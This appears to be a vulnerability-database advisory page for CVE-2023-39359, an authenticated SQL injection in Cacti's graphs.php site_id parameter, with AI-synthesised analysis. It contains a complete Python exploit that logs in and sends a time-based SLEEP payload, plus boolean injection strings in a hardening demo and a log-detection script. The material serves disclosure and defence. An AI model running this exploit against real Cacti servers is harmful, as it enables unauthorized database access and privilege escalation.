VYPR
Unrated severity · NVD Advisory · Published Sep 5, 2023 · Updated Feb 13, 2025

Authenticated SQL injection vulnerability in graphs.php in Cacti

CVE-2023-39359

Description

Cacti is an open source operational monitoring and fault management framework. An authenticated SQL injection vulnerability was discovered which allows authenticated users to perform privilege escalation and remote code execution. The vulnerability resides in the graphs.php file. When dealing with the cases of ajax_hosts and ajax_hosts_noany, if the site_id parameter is greater than 0, it is directly reflected in the WHERE clause of the SQL statement. This creates an SQL injection vulnerability. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability mechanics

Root cause

"The application directly embeds user-controlled input into SQL queries without proper sanitization."

Attack vector

An authenticated user can exploit this vulnerability by sending a crafted request to the `graphs.php` file. Specifically, when the `action` parameter is set to `ajax_hosts` or `ajax_hosts_noany`, and the `site_id` parameter is greater than 0, the value is directly incorporated into an SQL query's WHERE clause. This allows an attacker to inject malicious SQL code, such as a time-based SQL injection payload, to confirm the vulnerability [ref_id=1].

Affected code

The vulnerability resides in the `graphs.php` file. The affected code segments are within the `case 'ajax_hosts':` and `case 'ajax_hosts_noany':` blocks, where the `site_id` parameter is checked and then directly used to construct the `$sql_where` variable, which is subsequently included in an SQL statement [ref_id=1].

What the fix does

The advisory states that the vulnerability is addressed in version 1.2.25 but does not include the patch diff, so the exact change cannot be confirmed from this page. A correct fix for this class of bug validates `site_id` as an integer before it is used (a plain "greater than 0" comparison does not reject a string that merely starts with a digit) or binds the value as a query parameter, so that attacker-controlled text can never become part of the SQL statement.
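As an added illustration (not Cacti's code and not the 1.2.25 patch), the following Python reproduces the flawed pattern described under Affected code beside a hardened form that does what the fix must do. The `host` table, its columns and the leading-digit emulation of the "greater than 0" check are assumptions made so the example runs offline against SQLite; SQLite has no SLEEP(), so a boolean payload stands in for the time-based one used in the reproduction below.

```python
import re
import sqlite3

# Constructed stand-in for a hosts table (assumption, not Cacti's schema); the
# column names exist only so the queries can run offline.
SCHEMA = """
CREATE TABLE host (id INTEGER PRIMARY KEY, description TEXT, site_id INTEGER);
INSERT INTO host VALUES (1, 'router-site1', 1), (2, 'switch-site1', 1),
                        (3, 'router-site2', 2), (4, 'lab-box', 0);
"""


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def ajax_hosts_vulnerable(db, site_id):
    """Mirrors the pattern in the advisory: a '> 0' check that does not reject
    non-numeric input, then string concatenation into the WHERE clause.
    The check is emulated (assumption) by comparing only the leading digits,
    which is how a loose numeric comparison treats '1 OR 1=1'."""
    leading = re.match(r"\d+", str(site_id))
    sql_where = ""
    if leading and int(leading.group()) > 0:
        sql_where = f"WHERE site_id = {site_id}"  # untrusted text becomes SQL
    sql = f"SELECT id, description FROM host {sql_where} ORDER BY id"
    return db.execute(sql).fetchall()


def ajax_hosts_hardened(db, site_id):
    """Hardened form: require a pure non-negative integer, then bind it as a
    parameter so the value can never change the shape of the statement."""
    if not re.fullmatch(r"\d+", str(site_id)):
        raise ValueError(f"site_id must be a non-negative integer, got {site_id!r}")
    site_id = int(site_id)
    sql_where = ""
    params = ()
    if site_id > 0:
        sql_where = "WHERE site_id = ?"
        params = (site_id,)
    sql = f"SELECT id, description FROM host {sql_where} ORDER BY id"
    return db.execute(sql, params).fetchall()


def demo():
    """Run both builders against the same injected value and return the results."""
    db = connect()
    payload = "1 OR 1=1"  # boolean stand-in for the PoC's SLEEP()-based payload
    vulnerable_rows = ajax_hosts_vulnerable(db, payload)   # every host leaks
    try:
        hardened_result = ajax_hosts_hardened(db, payload)
    except ValueError as err:
        hardened_result = str(err)                        # payload rejected
    return vulnerable_rows, hardened_result


if __name__ == "__main__":
    rows, outcome = demo()
    print("vulnerable query returned", len(rows), "rows")
    print("hardened query:", outcome)
```

The hardened version does two independent things: it rejects anything that is not an integer before the comparison, and it binds the value as a parameter, so a later change to the check cannot quietly reintroduce concatenation.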

Preconditions

  • auth: The attacker must have authenticated user credentials for the Cacti application.
  • input: The `site_id` parameter must be greater than 0.

Reproduction

By running the following Python3 code, you will observe a delay of 10 seconds in the response, which indicates the occurrence of SQL injection.

```python
import argparse
import requests
import sys
import time
import urllib3

# Uncomment to route traffic through an intercepting proxy.
#import os
#os.environ['http_proxy'] = 'http://localhost:8080'

# Time-based payload: a vulnerable server stalls for sleep_time seconds.
sleep_time = 10
payload = f"""1 AND (SELECT 1 FROM (SELECT(SLEEP({sleep_time})))A)"""

def get_csrf_token():
    # Cacti embeds the csrfMagic token in the login page; the login POST needs it.
    url = f"{target}/index.php"
    res_body = session.get(url).content.decode()
    parts = res_body.split('var csrfMagicToken = "')
    csrf_token = parts[1].split('"')[0] if len(parts) > 1 else ''
    if not csrf_token:
        print("[-] Unable to find csrf_token")
        sys.exit()
    return csrf_token

def login(username, password):
    login_url = f"{target}/index.php"

    csrf_token = get_csrf_token()
    data = {'action': 'login', 'login_username': username, 'login_password': password, '__csrf_magic': csrf_token}
    res_body = session.post(login_url, data=data).content.decode()
    if 'You are now logged into <' in res_body:
        print('[+] Login successful!')
    else:
        print('[-] Login failed. Check your credentials')
        sys.exit()

def exploit():
    url = f"{target}/graphs.php"

    # Injection point: site_id is concatenated into the WHERE clause of the ajax_hosts query.
    params = {
        'action': 'ajax_hosts',
        'site_id': payload
    }

    print('[+] Sending payload...')
    print(f"[+] Payload: {payload}")
    start = time.monotonic()
    session.get(url, params=params)
    elapsed = time.monotonic() - start
    print(f"[+] Response took {elapsed:.1f}s (about {sleep_time}s means the SLEEP executed)")

if __name__ == '__main__':
    urllib3.disable_warnings()
    parser = argparse.ArgumentParser(description="Cacti 1.2.24 - graphs.php 'site_id' SQL Injection (authenticated)")
    parser.add_argument('-t', '--target', help='Base URL of the Cacti install', required=True)
    parser.add_argument('-u', '--username', help='Cacti username', required=True)
    parser.add_argument('-p', '--password', help='Cacti password', required=True)
    args = parser.parse_args()
    username = args.username
    password = args.password
    target = args.target
    session = requests.Session()
    session.verify = False  # TLS warnings are disabled above; skip verification for self-signed lab targets

    login(username, password)
    exploit()
```
[ref_id=1]
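For defenders, an added example (not from the advisory, the referenced PoC, or the Cacti project) that flags requests matching the attack vector above in Apache combined-format access logs: a `graphs.php` request with `action=ajax_hosts` or `ajax_hosts_noany` whose `site_id` is not a plain integer. The log lines are constructed for illustration and the `/cacti/` path prefix is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined format (not real Cacti logs).
# Line 2 carries the PoC's time-based payload, line 3 a boolean payload via
# the ajax_hosts_noany action; the rest are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2023:10:01:02 +0000] "GET /cacti/graphs.php?action=ajax_hosts&site_id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Sep/2023:10:01:09 +0000] "GET /cacti/graphs.php?action=ajax_hosts&site_id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))A) HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
10.0.0.7 - - [05/Sep/2023:10:02:00 +0000] "GET /cacti/graphs.php?action=ajax_hosts_noany&site_id=2%20OR%201%3D1 HTTP/1.1" 200 3071 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Sep/2023:10:03:00 +0000] "GET /cacti/graphs.php?action=graph_edit&id=5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Sep/2023:10:03:30 +0000] "GET /cacti/graphs.php?action=ajax_hosts&site_id=0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request URI, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# The two graphs.php actions named in the advisory.
TARGET_ACTIONS = {"ajax_hosts", "ajax_hosts_noany"}


def find_suspicious(log_text):
    """Return one record per request whose site_id is not a pure integer."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["uri"])
        if not parts.path.endswith("/graphs.php"):
            continue
        # parse_qs decodes both %XX escapes and '+', so the payload is compared in clear.
        qs = parse_qs(parts.query, keep_blank_values=True)
        action = qs.get("action", [""])[0]
        if action not in TARGET_ACTIONS:
            continue
        for value in qs.get("site_id", []):
            if not re.fullmatch(r"\d+", value):
                hits.append({"ip": m["ip"], "time": m["ts"],
                             "action": action, "site_id": value})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["action"]} site_id={hit["site_id"]!r}')
```

The rule is deliberately narrow (a non-integer `site_id` on exactly these two actions) so it produces no noise on legitimate use, where the UI only ever sends a numeric site identifier. If the log format also records response time, the PoC's SLEEP(10) payload additionally shows up as a request that took about ten seconds longer than its neighbours.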

Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
